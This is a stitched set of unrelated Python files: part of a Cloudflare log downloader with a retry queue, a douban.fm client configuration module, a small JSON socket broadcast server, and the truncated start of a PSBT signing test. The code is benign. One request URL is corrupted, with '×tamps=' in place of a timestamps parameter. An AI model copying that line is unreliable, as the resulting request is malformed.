If the logfile already exists, we assume that the logs have been pulled from Cloudflare previously.
'''
def prepare_path(log_start_time_rfc3339, log_end_time_rfc3339, data_folder, logfile_name_prefix, no_gzip):
logfile_name = logfile_name_prefix + "_" + log_start_time_rfc3339 + "~" + log_end_time_rfc3339 + (".json" if no_gzip is True else ".json.gz")
logfile_path = data_folder / logfile_name
if os.path.exists(str(logfile_path)):
return logfile_path, False
else:
return logfile_path, True
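'''
For illustration (the timestamps below are made up), with the default prefix and gzip enabled,
prepare_path() above would produce a logfile name such as:
    cf_logs_2020-12-31T12:34:00Z~2020-12-31T12:35:00Z.json.gz
placed inside the date/hour folder created by initialize_folder().
'''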
'''
A method to check whether the user initiates program exit.
This method will be triggered every time a logpull thread finishes its job (i.e. completes the logpull).
It subtracts 1 from the total number of running threads, and checks whether the user has triggered the program exit process.
If a program exit was initiated by the user, is_exit will be True, and this method makes sure the number of running threads is zero before exiting the program gracefully.
'''
def check_if_exited():
global is_exit, num_of_running_thread
num_of_running_thread -= 1
if is_exit is True and num_of_running_thread <= 0:
logger.info(str(datetime.now()) + " --- Program exited gracefully.")
sys.exit(0)
return False
'''
This method will be called if the process receives SIGINT or SIGTERM signal from the system.
The purpose is to gracefully terminate the program.
This method will check if the number of running threads is 0 (meaning no logpull subprocesses are running), and if so it will display an info message showing that the program exited gracefully.
This method also sets the is_exit flag so that other logpull subprocesses can check this flag before they exit.
'''
def graceful_terminate(signum, frame):
global is_exit, num_of_running_thread, event
is_exit = True
#stop all the sleep timers in other methods, particularly queue_thread()
event.set()
print("")
logger.info(str(datetime.now()) + " --- " + signal.Signals(signum).name + " detected. Initiating program exit. Finishing up log download tasks...")
if num_of_running_thread <= 0:
logger.info(str(datetime.now()) + " --- Program exited gracefully.")
sys.exit(0)
'''
This method is responsible for writing logs to local storage after the logs have been pulled from the Cloudflare API.
Depending on the user preference, logs might need to be saved in compressed gzip format.
'''
def write_logs(logfile_path, data, no_gzip):
dirname, basename = os.path.split(logfile_path)
try:
if no_gzip is True:
#open the temporary file as write mode if user specifies not to compress the logs. Save the logs from decoded text response.
logfile = tempfile.NamedTemporaryFile(mode="w", encoding="utf-8", prefix=basename, dir=dirname)
if log_type == "http":
#write the decompressed data
logfile.write(str(decompress(data).decode(encoding='utf-8')))
elif log_type == 'access':
#Cloudflare Access log does not compress by default. Can write to file directly.
logfile.write(data)
#after writing logs to temporary file, create a hard link from actual file to the temporary file
os.link(logfile.name, logfile_path)
else:
#open the temporary file as write binary mode to save the logs from raw gzipped response.
logfile = tempfile.NamedTemporaryFile(mode="wb", prefix=basename, dir=dirname)
if log_type == "http":
#write the compressed gzip data
logfile.write(data)
elif log_type == 'access':
#Cloudflare Access log does not compress by default. Data compression needs to be applied first.
logfile.write(compress(data.encode()))
#after writing logs to temporary file, create a hard link from actual file to the temporary file
os.link(logfile.name, logfile_path)
        #close the temporary file and it will be deleted automatically
logfile.close()
except Exception as e:
return False, e
return True, True
'''
This method will be run as a separate thread
Its main responsibility is to pick up new tasks from the queue and perform the logpull tasks again.
'''
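'''
A sketch of the item format stored in the persistent queue, mirroring the queue.put() calls
in logs_thread() further below (all values here are illustrative):
    {'folder_time': <local datetime>, 'log_start_time_utc': <UTC datetime>,
     'log_end_time_utc': <UTC datetime>, 'log_type': 'http',
     'reason': 'Logpull error (HTTP 429)'}
'''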
def queue_thread():
global num_of_running_thread, queue, is_exit, event
#ensure that this process is also counted as one running thread, useful to perform task cleanup while stopping the process
num_of_running_thread += 1
#failed count to check how many failed tasks
failed_count = 0
#wait for 5 seconds before starting the process below, doesn't make sense to check the queue immediately after running the tool
event.wait(5)
#keep below process in a loop until it's terminated by the user
while True:
try:
#check whether the queue has any content (size larger than 0)
if queue.size > 0:
#get the item from the queue based on FIFO
item = queue.get()
#then run the logpull task again
logger.info(str(datetime.now()) + " --- Retrying log range " + item.get('log_start_time_utc').isoformat() + "Z to " + item.get('log_end_time_utc').isoformat() + "Z from queue due to " + item.get('reason') + "... (currently " + str(queue.size) + " item(s) left in the queue)")
                _, status = logs_thread(item.get('folder_time'), item.get('log_start_time_utc'), item.get('log_end_time_utc'))
#check the status returned from the logpull process, if True means the last logpull task has been successful
if status is True:
failed_count = 0
event.wait(3)
else:
#if not, increment the failed count counter, also check if the failed tasks more than or equal to 3
failed_count += 1
if failed_count >= 3:
#too many failed tasks, wait for 60 seconds and try again
event.wait(60)
else:
#else, just wait for 3 seconds
event.wait(3)
else:
#if no item in the queue, wait for 5 seconds and try again
event.wait(5)
#check if the user wants to stop the logpull process, if no then just continue the looping
if is_exit is True:
time.sleep(1)
return check_if_exited()
else:
pass
except Exception as e:
logger.critical(str(datetime.now()) + " --- Queue thread failed unexpectedly. Exception message: " + str(e))
continue
'''
This method will handle the overall log processing tasks and it will run as a separate thread.
Based on the interval setting configured by the user, this method will only handle logs for a specific time slot.
'''
def logs_thread(current_time, log_start_time_utc, log_end_time_utc):
global num_of_running_thread, logger, retry_attempt, final_fields, log_dest, queue, one_time
#a list to store list of objects - log destination configuration
log_dest_per_thread = []
log_dest_per_thread_final = []
#add one to the variable to indicate number of running threads. useful to determine whether to exit the program gracefully
num_of_running_thread += 1
#specify the number of attempts to retry in the event of error
#Note! Setting 0 prevents retrying logpull tasks as defined in below code. The process will be replaced by queue_thread() instead.
retry_attempt = 0
#a variable to check whether the request to Cloudflare API is successful.
request_success = False
#a variable to check whether we should skip adding failed items to the queue (based on situation)
skip_add_queue = False
status_code = 0
cf_status_code = 0
cf_err_msg = ""
    #if the user instructs the program to do the logpull only one time, the logs will not be stored in a folder that follows the date and time naming convention
if one_time is True or (all(d.get('no_organize') is True for d in log_dest)):
pass
else:
#get the current date and hour, these will be used to initialize the folder to store the logs
today_date = str(current_time.date())
current_hour = str(current_time.hour) + "00"
#get the log start time and log end time in RFC3339 format, so Cloudflare API will understand it and pull the appropriate logs for us
log_start_time_rfc3339 = log_start_time_utc.isoformat() + 'Z'
log_end_time_rfc3339 = log_end_time_utc.isoformat() + 'Z'
#iterate through the list of objects - log destination configuration
for d in log_dest:
#check if the user wants to do one-time operation, or instructs not to organize logs into date and time folder
#if yes, leave the path value as it is
if d.get('no_organize') is True or one_time is True:
log_dest_per_thread.append({'name': d.get('name'), 'path': d.get('path'), 'prefix': d.get('prefix'), 'no_gzip': d.get('no_gzip')})
#if not, modify the path to include date and time folder
else:
log_dest_per_thread.append({'name': d.get('name'), 'path': d.get('path') + "/" + today_date + "/" + current_hour, 'prefix': d.get('prefix'), 'no_gzip': d.get('no_gzip')})
#iterate through the list of objects - log destination configuration
for p in log_dest_per_thread:
#create folder
data_folder = initialize_folder(p.get('path'))
#prepare the full path (incl. file name) to store the logs
logfile_path, prepare_status = prepare_path(log_start_time_rfc3339, log_end_time_rfc3339, data_folder, p.get('prefix'), p.get('no_gzip'))
#check the returned value from prepare_path() method. if False, means logfile already exists and no further action required
if prepare_status is False:
logger.warning(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Logfile " + str(logfile_path) + " already exists! Skipping.")
else:
log_dest_per_thread_final.append({'name': p.get('name'), 'path': logfile_path, 'no_gzip': p.get('no_gzip')})
#check if the python list is empty. Empty list means the particular logpull operation can be skipped because the log file already exists in all destinations.
if not log_dest_per_thread_final:
logger.warning(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Logfile exists in all paths. Skipping.")
return check_if_exited(), True
if log_type == "http":
#specify the URL for the Cloudflare API endpoint, with parameters such as Zone ID, the start time and end time of the logs to pull, timestamp format, sample rate and the fields to be included in the logs
url = "https://api.cloudflare.com/client/v4/zones/" + zone_id + "/logs/received?start=" + log_start_time_rfc3339 + "&end=" + log_end_time_rfc3339 + "×tamps="+ timestamp_format +"&sample=" + sample_rate + "&fields=" + final_fields
#specify headers for the content type and API token. Only accept gzip as response.
headers = {"Authorization": "Bearer " + api_token, "Content-Type": "application/json", "Accept-Encoding": "gzip", 'User-Agent': 'cf-logs-downloader (https://github.com/erictung1999/cf-logs-downloader)'}
logger.info(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Requesting HTTP logs from Cloudflare...")
elif log_type == 'access':
#specify the URL for the Cloudflare API endpoint, with parameters such as Account ID and the start time and end time of the logs to pull
url = "https://api.cloudflare.com/client/v4/accounts/" + account_id + "/access/logs/access_requests?since=" + log_start_time_rfc3339 + "&until=" + log_end_time_rfc3339 + "&limit=1000"
#specify headers for the content type and API token.
headers = {"Authorization": "Bearer " + api_token, "Content-Type": "application/json", 'User-Agent': 'cf-logs-downloader (https://github.com/erictung1999/cf-logs-downloader)'}
logger.info(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Requesting Cloudflare Access logs from Cloudflare...")
for i in range(retry_attempt+1):
#make a GET request to the Cloudflare API
try:
r = requests.get(url, headers=headers, stream=True if log_type == "http" else False)
r.encoding = 'utf-8'
except Exception as e:
logger.critical(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Unable to perform API request to Cloudflare: " + str(e) + ". " + (("Retrying " + str(i+1) + " of " + str(retry_attempt) + "...") if i < (retry_attempt) else ""))
time.sleep(3)
continue
#check whether the HTTP response code is 200, if yes then logpull success and exit the loop
status_code = r.status_code
if r.status_code == 200:
request_success = True
break
else:
#if HTTP response code is not 200, means something happened
logger.debug(str(datetime.now()) + " --- Output from Cloudflare API:\n" + r.text) #the raw response will be logged only if the user enables debugging
try:
#load the JSON object to better access the content of it
response = json.loads(r.text)
except:
#something weird happened if the response is not a JSON object, thus print out the error dump
logger.error(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Unknown error occured while pulling logs with error code " + str(r.status_code) + ". Error dump: " + r.text + ". " + (("Retrying " + str(i+1) + " of " + str(retry_attempt) + "...") if i < (retry_attempt) else ""))
time.sleep(3)
continue
#to check whether "success" key exists in JSON object, if yes, check whether the value is False, and print out the error message
if "success" in response:
if response["success"] is False:
logger.error(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Failed to request logs from Cloudflare with error code " + str(response["errors"][0]["code"]) + ": " + response["errors"][0]["message"] + ". " + ("Consider removing BotScore and BotScoreSrc fields if your zone does not have Bot Management enabled." if response["errors"][0]["code"] == 1010 and ('BotScore' in fields or 'BotScoreSrc' in fields) else ("Retrying " + str(i+1) + " of " + str(retry_attempt) + "...") if i < (retry_attempt) else ""))
cf_status_code = response["errors"][0]["code"]
cf_err_msg = response["errors"][0]["message"]
if response["errors"][0]["code"] == 1010 and ('BotScore' in fields or 'BotScoreSrc' in fields):
skip_add_queue = True
break
time.sleep(3)
continue
else:
#something weird happened if it is not False. If the request has been successfully done, it should not return this kind of error, instead the raw logs should be returned with HTTP response code 200.
logger.error(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Unknown error occured while pulling logs with error code " + str(r.status_code) + ". Error dump: " + r.text + ". " + (("Retrying " + str(i+1) + " of " + str(retry_attempt) + "...") if i < (retry_attempt) else ""))
time.sleep(3)
continue
else:
#other type of error may occur, which may not return a JSON object.
logger.error(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Unknown error occured while pulling logs with error code " + str(r.status_code) + ". Error dump: " + r.text + ". " + (("Retrying " + str(i+1) + " of " + str(retry_attempt) + "...") if i < (retry_attempt) else ""))
time.sleep(3)
continue
#check whether the logpull process from Cloudflare API has been successfully completed, if yes then proceed with next steps
if request_success is False and one_time is False:
#check if there's a need to add failed tasks to queue, if no, just add it to the log
if skip_add_queue is True:
fail_logger.error("Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + " [" + log_type + "] (Logpull error - HTTP " + str(status_code) + (", Cloudflare " + str(cf_status_code) + " - " + cf_err_msg if cf_status_code != 0 else "") + ")")
else:
queue.put({'folder_time': current_time, 'log_start_time_utc': log_start_time_utc, 'log_end_time_utc': log_end_time_utc, 'log_type': log_type, 'reason': 'Logpull error (HTTP ' + str(status_code) + (", Cloudflare " + str(cf_status_code) + " - " + cf_err_msg if cf_status_code != 0 else "") + ')'})
return check_if_exited(), False
i = 0
if log_type == "http":
#get the raw response (gzipped content) and save it into a variable.
gzip_resp = r.raw.read()
elif log_type == 'access':
json_resp = r.json()
if (len(json_resp["result"]) <= 0):
logger.warning(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": No Access logs during this time range. Will not write file to local storage. Skipping...")
succ_logger.info("Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + " [" + log_type + "] (No Access logs to write)")
return check_if_exited(), True
json_string_resp = [json.dumps(record) for record in json_resp["result"]]
#Proceed to save the logs
logger.info(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Logs requested. Saving logs...")
#iterate through list of objects - log destination configuration
for each_log_dest in log_dest_per_thread_final:
i += 1
logger.info(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Writing logs " + str(i) + " of " + str(len(log_dest_per_thread_final)) + " (" + each_log_dest.get('name') + ") to " + str(each_log_dest.get('path')) + " ...")
#write logs to the destination as specified by the user, with the option for gzip
if log_type == "http":
result, e = write_logs(each_log_dest.get('path'), gzip_resp, each_log_dest.get('no_gzip'))
elif log_type == "access":
result, e = write_logs(each_log_dest.get('path'), '\n'.join(json_string_resp) + '\n', each_log_dest.get('no_gzip'))
if result is True:
            #logs were written successfully
logger.info(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Logs " + ("without gzip compression" if each_log_dest.get('no_gzip') is True else "compressed with gzip") + " (" + each_log_dest.get('name') + ") saved as " + str(each_log_dest.get('path')) + ". ")
else:
            #failed to write the logs
logger.error(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Failed to save logs to local storage (" + each_log_dest.get('name') + "): " + str(e))
#add failed tasks to queue
if one_time is False:
queue.put({'folder_time': current_time, 'log_start_time_utc': log_start_time_utc, 'log_end_time_utc': log_end_time_utc, 'log_type': log_type, 'reason': 'Write log error (' + each_log_dest.get('name') + ')'})
return check_if_exited(), False
#only write success log if the operation is not one-time
if one_time is False:
succ_logger.info("Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + " [" + log_type + "] (" + each_log_dest.get('name') + ")")
#invoke this method to check whether the user triggers program exit sequence
return check_if_exited(), True
####################################################################################################
#register signals with a method. the method will be triggered if the user sends a signal to the program (SIGINT and SIGTERM)
signal.signal(signal.SIGINT, graceful_terminate)
signal.signal(signal.SIGTERM, graceful_terminate)
#This is where the real execution of the program begins. First it will initialize the parameters supplied by the user
initialize_arg()
#After the above execution, it will verify the Zone ID and API Token given by the user whether they are valid
verify_credential()
#if both Zone ID and API Token are valid, the logpull tasks will begin.
logger.info(str(datetime.now()) + " --- Cloudflare logs download tasks started. Log type: " + log_type)
#if the user instructs the program to do logpull for only one time, the program will not do the logpull jobs repeatedly
if one_time is True:
threading.Thread(target=logs_thread, args=(None, start_time_static, end_time_static)).start()
else:
#first get the current system time, both local and UTC time.
#the purpose of getting UTC time is to facilitate the calculation of the start and end time to pull the logs from Cloudflare API
#the purpose of getting local time is to generate a directory structure to store logs, separated by the date and time
current_time_utc = datetime.utcnow()
current_time = datetime.now()
#calculate how many seconds to go back from current time to pull the logs.
if log_type == "http":
        #minimum 60 seconds difference to accommodate Cloudflare logs delay, and also add at least 60 seconds or more, based on interval
logs_from = 60.0 + (((interval-1) // 60 * 60) + 60)
elif log_type == "access":
#add at least 60 seconds or more, based on interval
logs_from = 0.0 + (((interval-1) // 60 * 60) + 60)
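    #Worked example (assuming the default interval of 60 seconds):
    #  http:   logs_from = 60.0 + (((60-1) // 60 * 60) + 60) = 120, so the first log window
    #          starts about two minutes behind the current time
    #  access: logs_from = 0.0 + (((60-1) // 60 * 60) + 60) = 60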
#calculate the start time to pull the logs from Cloudflare API
log_start_time_utc = current_time_utc.replace(second=0, microsecond=0) - timedelta(seconds=logs_from)
current_time = current_time.replace(second=0, microsecond=0) - timedelta(seconds=logs_from)
    #this is useful when we need to repeat the execution of a code block at a fixed interval in an accurate way
    #the sleep at the end of the loop below uses it to keep each iteration aligned to the interval without drift
initial_time = time.time()
#create a new thread to handle failed tasks inside queue
threading.Thread(target=queue_thread).start()
#force the program to run indefinitely, unless the user stops it with Ctrl+C
while True:
#calculate the end time to pull the logs from Cloudflare API, based on the interval value given by the user
if log_type == "http":
log_end_time_utc = log_start_time_utc + timedelta(seconds=interval)
elif log_type == 'access':
#as Cloudflare Access log request API does not automatically exclude 1 second from end time like what Cloudflare Logpull API does,
#we must manually subtract 1 second so that subsequent log requests will not overlap with the time
log_end_time_utc = log_start_time_utc + timedelta(seconds=interval-1)
#create a new thread to handle the logs processing. the target method is logs() and 3 parameters are supplied to this method
threading.Thread(target=logs_thread, args=(current_time, log_start_time_utc, log_end_time_utc)).start()
#assigning start and end time to the next iteration
if log_type == "http":
log_start_time_utc = log_end_time_utc
elif log_type == 'access':
#adding 1 second back to the next iteration of start time, as previously 1 second deduction has been made
log_start_time_utc = log_end_time_utc + timedelta(seconds=1)
current_time = current_time + timedelta(seconds=interval)
time.sleep(interval - ((time.time() - initial_time) % interval))
|
config.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from threading import Thread
import cPickle as pickle
import ConfigParser
import logging
import time
import os
from doubanfm.API.login import request_token
from doubanfm.check import is_latest, update_package, is_mplayer
from doubanfm.exceptions import ConfigError
is_mplayer()
logger = logging.getLogger('doubanfm') # get logger
THEME = ['default', 'larapaste', 'monokai', 'tomorrow']
PATH_CONFIG = os.path.expanduser("~/.doubanfm_config")
PATH_HISTORY = os.path.expanduser('~/.doubanfm_history')
PATH_TOKEN = os.path.expanduser('~/.doubanfm_token')
CONFIG = '''
[key]
UP = k
DOWN = j
TOP = g
BOTTOM = G
OPENURL = w
RATE = r
NEXT = n
BYE = b
QUIT = q
PAUSE = p
LOOP = l
MUTE = m
LRC = o
HELP = h
HIGH = i
'''
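# A user can override any of these bindings by editing ~/.doubanfm_config; for example
# (an illustrative customisation, not a project default), remapping "next song" to N:
#
#   [key]
#   NEXT = N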
KEYS = {
'UP': 'k',
'DOWN': 'j',
'TOP': 'g',
'BOTTOM': 'G',
'OPENURL': 'w',
'RATE': 'r',
'NEXT': 'n',
'BYE': 'b',
'QUIT': 'q',
'PAUSE': 'p',
'LOOP': 'l',
'MUTE': 'm',
'LRC': 'o',
'HELP': 'h',
'HIGH': 'i'
}
class Config(object):
"""
提供默认值
"""
def __init__(self):
        self.volume = 50  # volume
        self.channel = 0  # channel
        self.theme_id = 0  # theme
        self.user_name = ''  # username
        self.netease = False  # whether to play 320k music from NetEase
        self.run_times = 0  # number of logins
        self.last_time = time.time()  # timestamp of the current login
        self.total_time = 0  # total logged-in time
        self.liked = 0  # songs marked with ❤
        self.banned = 0  # songs marked "never play again"
        self.played = 0  # total songs played
self.is_latest = True
self.login_data = self.get_login_data()
def output(args):
def _deco(func):
def _func(self):
print '\033[31m♥\033[0m ' + args,
tmp = func(self)
print ' [\033[32m OK \033[0m]'
return tmp
return _func
return _deco
def get_login_data(self):
"""
提供登陆的认证
这里顺带增加了 volume, channel, theme_id , netease, run_times的默认值
"""
if os.path.exists(PATH_TOKEN):
            # use the token saved from the last login
with open(PATH_TOKEN, 'r') as f:
login_data = pickle.load(f)
if 'cookies' not in login_data:
login_data = request_token()
else:
            # not logged in yet
login_data = request_token()
self.get_default_set(login_data)
self.get_user_states(login_data)
self.get_is_latest_version(login_data)
        Thread(target=self.check_version).start()  # check asynchronously on every run; the user is prompted on the next launch
return login_data
def check_version(self):
self.is_latest = is_latest('douban.fm')
def get_is_latest_version(self, login_data):
self.is_latest = login_data.get('is_latest', True)
if not self.is_latest:
            if_update = raw_input('douban.fm update detected, upgrade now? (Y) ')
if if_update.lower() == 'y':
update_package('douban.fm')
with open(PATH_TOKEN, 'w') as f:
login_data['is_latest'] = True
pickle.dump(login_data, f)
                print 'Please reopen douban.fm (if the upgrade failed you may need sudo: try sudo pip install --upgrade douban.fm)'
os._exit(0)
def get_default_set(self, login_data):
"""
        Restore the playback state that was recorded on exit.
"""
self.cookies = login_data.get('cookies', '')
self.user_name = login_data.get('user_name', '')
print '\033[31m♥\033[0m Get local token - Username: \033[33m%s\033[0m' %\
login_data['user_name']
self.channel = login_data.get('channel', 0)
print '\033[31m♥\033[0m Get channel [\033[32m OK \033[0m]'
self.volume = login_data.get('volume', 50)
print '\033[31m♥\033[0m Get volume [\033[32m OK \033[0m]'
self.theme_id = login_data.get('theme_id', 0)
print '\033[31m♥\033[0m Get theme [\033[32m OK \033[0m]'
self.netease = login_data.get('netease', False)
self.keys = self.get_keys()
def get_user_states(self, login_data):
"""
        Track user statistics.
"""
self.run_times = login_data.get('run_times', 0)
self.total_time = login_data.get('total_time', 0)
@output('Get keys')
def get_keys(self):
'''
        Load the key configuration and check whether it has been changed.
'''
if not os.path.exists(PATH_CONFIG):
with open(PATH_CONFIG, 'w') as F:
F.write(CONFIG)
else:
config = ConfigParser.ConfigParser()
with open(PATH_CONFIG, 'r') as cfgfile:
config.readfp(cfgfile)
options = config.options('key')
for option in options:
option = option.upper()
if option in KEYS:
KEYS[option] = config.get('key', option)
return KEYS
@property
def history(self):
try:
with open(PATH_HISTORY, 'r') as f:
history = pickle.load(f)
except IOError:
history = []
return history
def save_config(self, volume, channel, theme, netease):
"""
        Save history and login information.
"""
self.login_data['cookies'] = self.cookies
self.login_data['volume'] = volume
self.login_data['channel'] = channel
self.login_data['theme_id'] = theme
self.login_data['netease'] = netease
self.login_data['run_times'] = self.run_times + 1
self.login_data['last_time'] = self.last_time
self.login_data['total_time'] = self.total_time +\
time.time() - self.last_time
self.login_data['is_latest'] = self.is_latest
with open(PATH_TOKEN, 'w') as f:
pickle.dump(self.login_data, f)
# with open(PATH_HISTORY, 'w') as f:
# pickle.dump(history, f)
db_config = Config()
|
server.py
|
# coding: utf-8
# Author: Leo BRUNEL
# Contact: contact@leobrunel.com
# This file is part of Wizard
# MIT License
# Copyright (c) 2021 Leo brunel
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
ip_address = 'localhost'
port = 50333
# Python modules
import socket
import sys
import threading
import time
import traceback
import json
import logging
from logging.handlers import RotatingFileHandler
import os
import struct
# create logger
logger = logging.getLogger('WIZARD-SERVER')
logger.setLevel(logging.DEBUG)
user_path = os.path.expanduser('~/Documents/wizard_2/')
if not os.path.isdir(user_path):
os.mkdir(user_path)
log_file = os.path.join(user_path, "wizard_server.log")
# create file handler and set level to debug
file_handler = RotatingFileHandler(log_file, mode='a', maxBytes=1000000, backupCount=1000, encoding=None, delay=False)
# create console handler and set level to debug
stream_handler = logging.StreamHandler()
stream_handler.setLevel(logging.DEBUG)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to handlers
stream_handler.setFormatter(formatter)
file_handler.setFormatter(formatter)
# add handlers to logger
logger.addHandler(stream_handler)
logger.addHandler(file_handler)
logger.info("Python : " + str(sys.version))
def get_server(DNS):
server = None
server_address = None
try:
server_address = socket.gethostbyname(DNS[0])
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(DNS)
server.listen(100)
except ConnectionRefusedError:
logger.debug(f"Socket connection refused : host={DNS[0]}, port={DNS[1]}")
return None
    except socket.timeout:
        logger.debug(f"Socket timeout : host={DNS[0]}, port={DNS[1]}")
        return None
except:
logger.debug(str(traceback.format_exc()))
return None
return server, server_address
def send_signal_with_conn(conn, msg_raw, only_debug = False):
try:
msg = json.dumps(msg_raw).encode('utf8')
msg = struct.pack('>I', len(msg)) + msg
conn.sendall(msg)
return 1
    except ConnectionRefusedError:
        if only_debug:
            logger.debug("Socket connection refused while sending signal")
        else:
            logger.error("Socket connection refused while sending signal")
        return None
    except socket.timeout:
        if only_debug:
            logger.debug("Socket timeout while sending signal")
        else:
            logger.error("Socket timeout while sending signal")
        return None
except:
if only_debug:
logger.debug(str(traceback.format_exc()))
else:
logger.error(str(traceback.format_exc()))
return None
def recvall(sock):
try:
raw_msglen = recvall_with_given_len(sock, 4)
if not raw_msglen:
return None
msglen = struct.unpack('>I', raw_msglen)[0]
return recvall_with_given_len(sock, msglen)
    except ConnectionRefusedError:
        logger.debug("Socket connection refused while receiving")
        return None
    except socket.timeout:
        logger.debug("Socket timeout while receiving")
        return None
except:
logger.debug(str(traceback.format_exc()))
return None
def recvall_with_given_len(sock, n):
try:
data = bytearray()
while len(data) < n:
packet = sock.recv(n - len(data))
if not packet:
return None
data.extend(packet)
return data
    except ConnectionRefusedError:
        logger.debug("Socket connection refused while receiving")
        return None
    except socket.timeout:
        logger.debug("Socket timeout while receiving")
        return None
    except:
        logger.debug(str(traceback.format_exc()))
        return None
class server(threading.Thread):
def __init__(self):
super(server, self).__init__()
logger.info("Starting server on : '" + str(ip_address) + "'")
logger.info("Default port : '" + str(port) + "'")
        self.server, self.server_address = get_server((ip_address, port))
logger.info("Server started")
self.client_ids = dict()
def run(self):
while True:
try:
conn, addr = self.server.accept()
entry_message = recvall(conn)
self.analyse_signal(entry_message, conn, addr)
except:
logger.error(str(traceback.format_exc()))
continue
def analyse_signal(self, msg_raw, conn, addr):
data = json.loads(msg_raw)
if data['type'] == 'test_conn':
logger.info('test_conn')
elif data['type'] == 'refresh_team':
client_dic = dict()
client_dic['id'] = None
self.broadcast(data, client_dic)
elif data['type'] == 'new_client':
self.add_client(data['user_name'], conn, addr, data['project'])
def add_client(self, user_name, conn, addr, project):
client_dic = dict()
client_dic['user_name'] = user_name
client_dic['conn'] = conn
client_dic['addr'] = addr
client_dic['project'] = project
client_id = str(time.time())
client_dic['id'] = client_id
self.client_ids[client_id]=client_dic
threading.Thread(target=self.clientThread, args=(client_id, user_name, conn, addr, project)).start()
logger.info("New client : {}, {}, {}, {}".format(client_id, user_name, addr, project))
signal_dic = dict()
signal_dic['type'] = 'new_user'
signal_dic['user_name'] = user_name
signal_dic['project'] = project
self.broadcast(signal_dic, self.client_ids[client_id])
self.send_users_to_new_client(client_dic)
def send_users_to_new_client(self, client_dic):
for client in self.client_ids.keys():
if client != client_dic['id']:
signal_dic = dict()
signal_dic['type'] = 'new_user'
signal_dic['user_name'] = self.client_ids[client]['user_name']
signal_dic['project'] = self.client_ids[client]['project']
send_signal_with_conn(client_dic['conn'], signal_dic)
def clientThread(self, client_id, user_name, conn, addr, project):
client_dic = dict()
client_dic['id'] = client_id
client_dic['user_name'] = user_name
client_dic['conn'] = conn
client_dic['addr'] = addr
client_dic['project'] = project
running = True
while running:
try:
raw_data = recvall(client_dic['conn'])
if raw_data is not None:
data = json.loads(raw_data)
self.broadcast(data, client_dic)
else:
if conn is not None:
self.remove_client(client_dic)
running = False
except:
logger.error(str(traceback.format_exc()))
continue
def broadcast(self, data, client_dic):
logger.debug("Broadcasting : " + str(data))
for client in self.client_ids.keys():
if client != client_dic['id']:
if not send_signal_with_conn(self.client_ids[client]['conn'], data):
self.remove_client(self.client_ids[client])
def remove_client(self, client_dic):
if client_dic['id'] in self.client_ids.keys():
logger.info("Removing client : {}, {}, {}, {}".format(client_dic['id'], client_dic['user_name'], client_dic['addr'], client_dic['project']))
del self.client_ids[client_dic['id']]
client_dic['conn'].close()
signal_dic = dict()
signal_dic['type'] = 'remove_user'
signal_dic['user_name'] = client_dic['user_name']
signal_dic['project'] = client_dic['project']
self.broadcast(signal_dic, client_dic)
if __name__ == "__main__":
try:
server = server()
server.daemon = True
server.start()
print('Press Ctrl+C to quit...')
        while True:
            time.sleep(1)
except KeyboardInterrupt:
print('Stopping server...')
        sys.exit()
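# Minimal client sketch (illustration only, not part of the original server): shows the
# framing expected by send_signal_with_conn()/recvall() -- a 4-byte big-endian length
# prefix followed by a UTF-8 JSON payload. Hostname/port reuse the module defaults; the
# 'new_client' fields mirror what analyse_signal() expects.
def _example_client(user_name='test_user', project='test_project'):
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect((ip_address, port))
    payload = json.dumps({'type': 'new_client',
                          'user_name': user_name,
                          'project': project}).encode('utf8')
    conn.sendall(struct.pack('>I', len(payload)) + payload)  # length-prefixed frame
    reply = recvall(conn)  # blocks until the server sends a frame (e.g. an existing-user notification)
    conn.close()
    return json.loads(reply) if reply else None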
|
test_sign_psbt.py
|
import pytest
import threading
from decimal import Decimal
from typing import List
from pathlib import Path
